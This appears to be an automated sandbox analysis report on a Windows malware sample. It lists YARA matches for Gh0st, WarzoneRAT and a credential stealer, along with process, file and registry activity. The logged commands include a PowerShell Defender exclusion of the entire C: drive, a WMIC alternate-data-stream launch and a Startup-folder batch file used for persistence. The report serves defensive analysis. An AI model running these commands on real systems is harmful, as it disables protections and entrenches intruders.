          Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 4.2.images.exe.22f89af.2.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 4.2.images.exe.22f89af.2.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 4.3.images.exe.720700.6.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000004.00000002.523218052.0000000002E2F000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000000.00000003.252571359.0000000000721000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: String function: 00407FC0 appears 33 times
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: String function: 02D20969 appears 47 times
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: String function: 02D135E5 appears 40 times
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000000.242916125.0000000000554000.00000008.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameATLDUCK.DLL> vs SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameATLDUCK.DLL> vs SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Binary or memory string: OriginalFilenameATLDUCK.DLL> vs SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | File created: C:\Users\user\AppData\Local\Microsoft Vision\
          Source: classification engine | Classification label: mal100.phis.troj.spyw.expl.evad.winEXE@18/18@0/1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D1D49C OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_00406750 LoadResource,LockResource,SizeofResource,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | File created: C:\Program Files\Microsoft DN1
          Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat" "
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | ReversingLabs: Detection: 24%
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | File read: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
          Source: C:\ProgramData\images.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
          Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat" "
          Source: C:\ProgramData\images.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create '"C:\ProgramData:ApplicationData"'
          Source: unknown | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
          Source: unknown | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
          Source: C:\ProgramData\images.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
          Source: C:\ProgramData\images.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create '"C:\ProgramData:ApplicationData"'
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}\InprocServer32
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D1F619 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,
          Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_caqnsxdv.wy2.ps1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D2290F CoInitialize,CoCreateInstance,VariantInit,CoUninitialize,
          Source: C:\ProgramData\images.exe | Code function: 4_3_02F494E0 GetVersionExW,MultiByteToWideChar,MultiByteToWideChar,_malloc,MultiByteToWideChar,_free,GetVersionExW,GetDiskFreeSpaceW,GetDiskFreeSpaceA,_free,
          Source: images.exe, images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
          Source: images.exe, images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
          Source: images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
          Source: images.exe, images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
          Source: images.exe, images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
          Source: images.exe, images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
          Source: images.exe, images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D220B8 RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6992:120:WilError_01
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6376:120:WilError_01
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6860:120:WilError_01
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6848:120:WilError_01
          Source: C:\ProgramData\images.exe | File written: C:\Program Files\Microsoft DN1\rdpwrap.ini
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\ProgramData\images.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Directory created: C:\Program Files\Microsoft DN1
          Source: C:\ProgramData\images.exe | Directory created: C:\Program Files\Microsoft DN1\sqlmap.dll
          Source: C:\ProgramData\images.exe | Directory created: C:\Program Files\Microsoft DN1\rdpwrap.ini
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
